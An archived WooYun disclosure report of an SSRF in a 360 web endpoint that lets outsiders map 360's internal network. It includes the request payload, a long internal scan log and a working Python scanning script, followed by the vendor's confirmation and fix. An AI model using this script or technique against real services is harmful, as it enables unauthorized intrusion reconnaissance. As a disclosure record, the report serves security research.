破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

利用一个SSRF再探360内网(附验证脚本)

编号90257
Urlhttp://www.wooyun.org/bug.php?action=view&id=90257
漏洞状态厂商已经确认
漏洞标题利用一个SSRF再探360内网(附验证脚本)
漏洞类型设计缺陷/逻辑错误
厂商奇虎360
白帽子lijiejie
提交日期2015-01-06 14:42:00
公开日期2015-02-20 14:44:00
修复时间(not set)
确认时间2015-01-06 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank6
厂商评级
厂商评rank7
漏洞简介
利用一个SSRF再探360内网(附验证脚本)
漏洞细节

SSRF位于:

POST http://wasai.360.cn/gen_inform.php
city=http://10.108.79.189:80/&imgurl=&name=e&time=2015-1-6&weibo=1


脚本会向参数city和imgurl指定的目标发起HTTP请求,可探测360内网。
如果不开放HTTP服务,返回特征串:

13:32:34 <glueImage img error:http_code:0 content_length:-1 image_length:0>


如果对应的端口开放了HTTP服务,则可能返回3种情况:
1) 图片生成成功了

{"s":true,"m":"ok","d":"http:\/\/p1.qhimg.com\/t011db843f5245a2050.jpg"}


2) 返回非200的状态码

<glueImage img error:http_code:404 content_length:202 image_length:202>


3) 返回200,但不是一个正确的图片

<glueImage img error:UnableToOpenFile `/tmp/magick-6713FEEry8oqbqOu': No such file or directory @ error/constitute.c/ReadImage/594>

POC

测试扫描10.108.79.* C段:

360_ssrf_2.png


D:\ssrf>360_ssrf_2.py
[OK]http://10.108.79.6:80/ => 200 (Not an Image)
[OK]http://10.108.79.10:80/ => 200 (Not an Image)
[OK]http://10.108.79.12:80/ => 200 (Not an Image)
[OK]http://10.108.79.11:80/ => 200 (Not an Image)
[OK]http://10.108.79.14:80/ => http_code:404 content_length:168
[OK]http://10.108.79.16:80/ => http_code:404 content_length:168
[OK]http://10.108.79.17:80/ => http_code:404 content_length:168
[OK]http://10.108.79.18:80/ => 200 (Not an Image)
[OK]http://10.108.79.20:80/ => 200 (Not an Image)
[OK]http://10.108.79.22:80/ => 200 (Not an Image)
[OK]http://10.108.79.21:80/ => 200 (Not an Image)
[OK]http://10.108.79.26:80/ => http_code:401 content_length:401
[OK]http://10.108.79.29:80/ => 200 (Not an Image)
[OK]http://10.108.79.27:80/ => http_code:404 content_length:198
[OK]http://10.108.79.31:80/ => 200 (Not an Image)
[OK]http://10.108.79.33:80/ => 200 (Not an Image)
[OK]http://10.108.79.34:80/ => 200 (Not an Image)
[OK]http://10.108.79.35:80/ => 200 (Not an Image)
[OK]http://10.108.79.39:80/ => http_code:403 content_length:168
[OK]http://10.108.79.38:80/ => http_code:403 content_length:168
[OK]http://10.108.79.42:80/ => 200 (Not an Image)
[OK]http://10.108.79.43:80/ => 200 (Not an Image)
[OK]http://10.108.79.41:80/ => 200 (Not an Image)
[OK]http://10.108.79.49:80/ => 200 (Not an Image)
[OK]http://10.108.79.44:80/ => 200 (Not an Image)
[OK]http://10.108.79.48:80/ => 200 (Not an Image)
[OK]http://10.108.79.47:80/ => 200 (Not an Image)
[OK]http://10.108.79.50:80/ => http_code:403 content_length:168
[OK]http://10.108.79.54:80/ => http_code:403 content_length:168
[OK]http://10.108.79.55:80/ => http_code:403 content_length:168
[OK]http://10.108.79.53:80/ => http_code:403 content_length:168
[OK]http://10.108.79.58:80/ => 200 (Not an Image)
[OK]http://10.108.79.59:80/ => 200 (Not an Image)
[OK]http://10.108.79.57:80/ => 200 (Not an Image)
[OK]http://10.108.79.60:80/ => 200 (Not an Image)
[OK]http://10.108.79.61:80/ => http_code:403 content_length:168
[OK]http://10.108.79.63:80/ => http_code:404 content_length:198
[OK]http://10.108.79.62:80/ => http_code:403 content_length:168
[OK]http://10.108.79.66:80/ => http_code:404 content_length:198
[OK]http://10.108.79.69:80/ => http_code:404 content_length:198
[OK]http://10.108.79.64:80/ => http_code:404 content_length:198
[OK]http://10.108.79.65:80/ => http_code:404 content_length:198
[OK]http://10.108.79.71:80/ => http_code:403 content_length:168
[OK]http://10.108.79.72:80/ => http_code:403 content_length:168
[OK]http://10.108.79.73:80/ => http_code:403 content_length:168
[OK]http://10.108.79.76:80/ => http_code:404 content_length:198
[OK]http://10.108.79.78:80/ => 200 (Not an Image)
[OK]http://10.108.79.79:80/ => 200 (Not an Image)
[OK]http://10.108.79.77:80/ => 200 (Not an Image)
[OK]http://10.108.79.80:80/ => 200 (Not an Image)
[OK]http://10.108.79.81:80/ => 200 (Not an Image)
[OK]http://10.108.79.82:80/ => http_code:404 content_length:198
[OK]http://10.108.79.89:80/ => http_code:403 content_length:168
[OK]http://10.108.79.88:80/ => http_code:404 content_length:198
[OK]http://10.108.79.90:80/ => http_code:403 content_length:168
[OK]http://10.108.79.92:80/ => http_code:403 content_length:168
[OK]http://10.108.79.95:80/ => http_code:404 content_length:198
[OK]http://10.108.79.93:80/ => http_code:404 content_length:198
[OK]http://10.108.79.94:80/ => http_code:404 content_length:198
[OK]http://10.108.79.105:80/ => http_code:404 content_length:198
[OK]http://10.108.79.108:80/ => http_code:404 content_length:168
[OK]http://10.108.79.103:80/ => http_code:404 content_length:198
[OK]http://10.108.79.104:80/ => http_code:404 content_length:198
[OK]http://10.108.79.106:80/ => http_code:404 content_length:198
[OK]http://10.108.79.118:80/ => 200 (Not an Image)
[OK]http://10.108.79.117:80/ => 200 (Not an Image)
[OK]http://10.108.79.119:80/ => 200 (Not an Image)
[OK]http://10.108.79.121:80/ => http_code:404 content_length:198
[OK]http://10.108.79.123:80/ => http_code:404 content_length:198
[OK]http://10.108.79.122:80/ => http_code:404 content_length:198
[OK]http://10.108.79.127:80/ => http_code:404 content_length:198
[OK]http://10.108.79.126:80/ => http_code:404 content_length:168
[OK]http://10.108.79.124:80/ => http_code:404 content_length:198
[OK]http://10.108.79.125:80/ => http_code:404 content_length:168
[OK]http://10.108.79.130:80/ => http_code:403 content_length:202
[OK]http://10.108.79.128:80/ => http_code:404 content_length:198
[OK]http://10.108.79.129:80/ => http_code:403 content_length:202
[OK]http://10.108.79.136:80/ => http_code:404 content_length:168
[OK]http://10.108.79.134:80/ => http_code:404 content_length:198
[OK]http://10.108.79.135:80/ => http_code:404 content_length:168
[OK]http://10.108.79.140:80/ => http_code:404 content_length:168
[OK]http://10.108.79.145:80/ => http_code:403 content_length:168
[OK]http://10.108.79.143:80/ => http_code:404 content_length:162
[OK]http://10.108.79.147:80/ => 200 (Not an Image)
[OK]http://10.108.79.144:80/ => http_code:404 content_length:162
[OK]http://10.108.79.148:80/ => 200 (Not an Image)
[OK]http://10.108.79.146:80/ => http_code:403 content_length:168
[OK]http://10.108.79.149:80/ => 200 (Not an Image)
[OK]http://10.108.79.150:80/ => 200 (Not an Image)
[OK]http://10.108.79.160:80/ => http_code:404 content_length:198
[OK]http://10.108.79.157:80/ => http_code:404 content_length:198
[OK]http://10.108.79.154:80/ => http_code:404 content_length:198
[OK]http://10.108.79.156:80/ => http_code:404 content_length:198
[OK]http://10.108.79.159:80/ => http_code:404 content_length:198
[OK]http://10.108.79.158:80/ => http_code:404 content_length:198
[OK]http://10.108.79.155:80/ => http_code:404 content_length:198
[OK]http://10.108.79.151:80/ => 200 (Not an Image)
[OK]http://10.108.79.164:80/ => http_code:404 content_length:198
[OK]http://10.108.79.166:80/ => http_code:404 content_length:198
[OK]http://10.108.79.167:80/ => http_code:404 content_length:198
[OK]http://10.108.79.162:80/ => http_code:404 content_length:198
[OK]http://10.108.79.165:80/ => http_code:404 content_length:198
[OK]http://10.108.79.168:80/ => http_code:404 content_length:198
[OK]http://10.108.79.163:80/ => http_code:404 content_length:198
[OK]http://10.108.79.170:80/ => http_code:404 content_length:198
[OK]http://10.108.79.169:80/ => http_code:404 content_length:198
[OK]http://10.108.79.161:80/ => http_code:404 content_length:198
[OK]http://10.108.79.173:80/ => http_code:404 content_length:198
[OK]http://10.108.79.171:80/ => http_code:404 content_length:198
[OK]http://10.108.79.175:80/ => http_code:404 content_length:198
[OK]http://10.108.79.172:80/ => http_code:404 content_length:198
[OK]http://10.108.79.174:80/ => http_code:404 content_length:198
[OK]http://10.108.79.176:80/ => http_code:404 content_length:198
[OK]http://10.108.79.177:80/ => http_code:404 content_length:198
[OK]http://10.108.79.180:80/ => http_code:404 content_length:198
[OK]http://10.108.79.178:80/ => http_code:404 content_length:198
[OK]http://10.108.79.181:80/ => http_code:404 content_length:198
[OK]http://10.108.79.182:80/ => http_code:404 content_length:198
[OK]http://10.108.79.188:80/ => 200 (Not an Image)
[OK]http://10.108.79.184:80/ => http_code:404 content_length:198
[OK]http://10.108.79.183:80/ => http_code:404 content_length:198
[OK]http://10.108.79.186:80/ => 200 (Not an Image)
[OK]http://10.108.79.185:80/ => 200 (Not an Image)
[OK]http://10.108.79.187:80/ => 200 (Not an Image)
[OK]http://10.108.79.190:80/ => 200
[OK]http://10.108.79.189:80/ => 200
[OK]http://10.108.79.194:80/ => 200 (Not an Image)
[OK]http://10.108.79.195:80/ => 200 (Not an Image)
[OK]http://10.108.79.198:80/ => 200 (Not an Image)
[OK]http://10.108.79.193:80/ => 200 (Not an Image)
[OK]http://10.108.79.196:80/ => 200 (Not an Image)
[OK]http://10.108.79.197:80/ => 200 (Not an Image)
[OK]http://10.108.79.200:80/ => 200 (Not an Image)
[OK]http://10.108.79.199:80/ => 200 (Not an Image)
[OK]http://10.108.79.201:80/ => 200 (Not an Image)
[OK]http://10.108.79.204:80/ => 200 (Not an Image)
[OK]http://10.108.79.202:80/ => 200 (Not an Image)
[OK]http://10.108.79.203:80/ => 200 (Not an Image)
[OK]http://10.108.79.205:80/ => 200 (Not an Image)
[OK]http://10.108.79.206:80/ => 200 (Not an Image)
[OK]http://10.108.79.207:80/ => 200 (Not an Image)
[OK]http://10.108.79.208:80/ => 200 (Not an Image)
[OK]http://10.108.79.210:80/ => 200 (Not an Image)
[OK]http://10.108.79.211:80/ => 200 (Not an Image)
[OK]http://10.108.79.212:80/ => http_code:404 content_length:198
[OK]http://10.108.79.213:80/ => http_code:404 content_length:198
[OK]http://10.108.79.220:80/ => http_code:404 content_length:198
[OK]http://10.108.79.219:80/ => http_code:404 content_length:198
[OK]http://10.108.79.221:80/ => http_code:404 content_length:198
[OK]http://10.108.79.222:80/ => http_code:403 content_length:168
[OK]http://10.108.79.223:80/ => http_code:403 content_length:168
[OK]http://10.108.79.225:80/ => http_code:403 content_length:168
[OK]http://10.108.79.224:80/ => http_code:403 content_length:168
[OK]http://10.108.79.226:80/ => http_code:403 content_length:168
[OK]http://10.108.79.227:80/ => http_code:403 content_length:168
[OK]http://10.108.79.230:80/ => http_code:404 content_length:198
[OK]http://10.108.79.232:80/ => http_code:403 content_length:168
[OK]http://10.108.79.233:80/ => http_code:403 content_length:168
[OK]http://10.108.79.234:80/ => http_code:403 content_length:168
[OK]http://10.108.79.239:80/ => 200 (Not an Image)
[OK]http://10.108.79.235:80/ => http_code:404 content_length:198
[OK]http://10.108.79.237:80/ => http_code:404 content_length:198
[OK]http://10.108.79.236:80/ => http_code:404 content_length:198
[OK]http://10.108.79.240:80/ => 200 (Not an Image)
[OK]http://10.108.79.241:80/ => 200 (Not an Image)
[OK]http://10.108.79.242:80/ => 200 (Not an Image)
[OK]http://10.108.79.243:80/ => http_code:403 content_length:168
[OK]http://10.108.79.247:80/ => http_code:403 content_length:168
[OK]http://10.108.79.245:80/ => 200 (Not an Image)
[OK]http://10.108.79.246:80/ => http_code:403 content_length:168
[OK]http://10.108.79.249:80/ => http_code:404 content_length:198
[OK]http://10.108.79.250:80/ => http_code:403 content_length:168
[OK]http://10.108.79.251:80/ => http_code:403 content_length:168
[OK]http://10.108.79.23:8080/ => 200 (Not an Image)
[OK]http://10.108.79.25:8080/ => 200 (Not an Image)
[OK]http://10.108.79.62:8080/ => http_code:403 content_length:168
[OK]http://10.108.79.61:8080/ => http_code:403 content_length:168
[OK]http://10.108.79.133:8080/ => http_code:404 content_length:0
[OK]http://10.108.79.1:8360/ => 200 (Not an Image)
[OK]http://10.108.79.2:8360/ => 200 (Not an Image)
[OK]http://10.108.79.3:8360/ => 200 (Not an Image)
[OK]http://10.108.79.4:8360/ => 200 (Not an Image)
[OK]http://10.108.79.11:8360/ => http_code:404 content_length:0
[OK]http://10.108.79.13:8360/ => 200 (Not an Image)
[OK]http://10.108.79.15:8360/ => 200 (Not an Image)
[OK]http://10.108.79.20:8360/ => 200
[OK]http://10.108.79.18:8360/ => http_code:500 content_length:0
[OK]http://10.108.79.26:8360/ => http_code:404 content_length:198
[OK]http://10.108.79.28:8360/ => http_code:404 content_length:198
[OK]http://10.108.79.27:8360/ => http_code:404 content_length:198
[OK]http://10.108.79.36:8360/ => 200 (Not an Image)
[OK]http://10.108.79.37:8360/ => 200 (Not an Image)
[OK]http://10.108.79.42:8360/ => http_code:502 content_length:172
[OK]http://10.108.79.59:8360/ => http_code:404 content_length:0
[OK]http://10.108.79.63:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.64:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.66:8360/ => http_code:404 content_length:0
[OK]http://10.108.79.80:8360/ => http_code:403 content_length:168
[OK]http://10.108.79.79:8360/ => http_code:403 content_length:168
[OK]http://10.108.79.96:8360/ => http_code:404 content_length:198
[OK]http://10.108.79.97:8360/ => http_code:404 content_length:198
[OK]http://10.108.79.100:8360/ => http_code:404 content_length:0
[OK]http://10.108.79.101:8360/ => http_code:404 content_length:0
[OK]http://10.108.79.110:8360/ => http_code:404 content_length:0
[OK]http://10.108.79.127:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.136:8360/ => http_code:403 content_length:168
[OK]http://10.108.79.135:8360/ => http_code:403 content_length:168
[OK]http://10.108.79.140:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.183:8360/ => http_code:404 content_length:198
[OK]http://10.108.79.185:8360/ => http_code:403 content_length:169
[OK]http://10.108.79.184:8360/ => http_code:500 content_length:0
[OK]http://10.108.79.186:8360/ => http_code:403 content_length:169
[OK]http://10.108.79.190:8360/ => http_code:403 content_length:162
[OK]http://10.108.79.189:8360/ => http_code:403 content_length:162
[OK]http://10.108.79.193:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.195:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.194:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.196:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.197:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.199:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.198:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.200:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.201:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.202:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.203:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.228:8360/ => http_code:404 content_length:198
[OK]http://10.108.79.230:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.235:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.237:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.236:8360/ => http_code:302 content_length:0
[OK]http://10.108.79.242:8360/ => http_code:403 content_length:169
[OK]http://10.108.79.244:8360/ => http_code:403 content_length:168
[OK]http://10.108.79.248:8360/ => http_code:403 content_length:168
[OK]http://10.108.79.250:8360/ => http_code:302 content_length:0
All Done


验证脚本,供参考:

#encoding=gbk
import httplib
import threading
import Queue
import json
import sys
import re
lock = threading.Lock()
queue = Queue.Queue()
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
def scan_http_service():
while True:
try:
item = queue.get(timeout=1.0)
except:
break

try:
conn = httplib.HTTPConnection('wasai.360.cn', timeout=3)
url = 'http://%s:%s/' % (item['ip'], item['port'])
conn.request(method='POST',
url='/gen_inform.php',
body='city=%s&imgurl=&name=e&time=2015-1-6&weibo=1' % url,
headers=headers)
html_doc = conn.getresponse().read()
conn.close()
if html_doc.find('http_code:0 content_length:-1') >= 0: # no HTTP Service
continue

if html_doc.find('img error:UnableToOpenFile') > 0: # Not an image
lock.acquire()
sys.stdout.write('[OK]%s\t=>\t200 (Not an Image)\n' % url)
lock.release()
continue

if html_doc.find('http_code:') > 0:
s = re.search('http_code:\d+ content_length:\d+', html_doc).group(0)
lock.acquire()
sys.stdout.write('[OK]%s\t=>\t%s\n' % (url, s) )
lock.release()
continue

json_doc = json.loads(html_doc)
if json_doc['s'] == True:
lock.acquire()
sys.stdout.write('[OK]%s\t=>\t200\n' % url)
lock.release()

except Exception, e:
pass
for port in [80, 8080, 8888, 8360]:
for i in range(1, 256):
queue.put({'ip': '10.108.79.%s' % i, 'port': port})
threads = []
for i in range(10):
t = threading.Thread(target=scan_http_service)
t.start()
threads.append(t)
for t in threads:
t.join()

print 'All Done'

修复方案

建议限制一下目标域

状态信息 2015-01-06: 细节已通知厂商并且等待厂商处理中
2015-01-06: 厂商已经确认,细节仅向厂商公开
2015-01-16: 细节向核心白帽子及相关领域专家公开
2015-01-26: 细节向普通白帽子公开
2015-02-05: 细节向实习白帽子公开
2015-02-20: 细节向公众公开
厂商回复感谢您的反馈,相关业务已进行修复。
回应信息危害等级:中漏洞Rank:7 确认时间:2015-01-06 15:31
Showing 1-6 of 6 items.
评论内容评论人点赞数评论时间

。。。。。。。。。。

Power02015-01-06 16:03:00

test

bey0nd02015-01-06 15:30:00

刷洞的节奏啊。。提交真多哈。

岩少02015-01-06 15:02:00

感觉要被忽略

帅气小狼狗02015-01-06 15:00:00

叼!

px162402015-01-06 14:48:00

mark

茜茜公主02015-01-06 14:44:00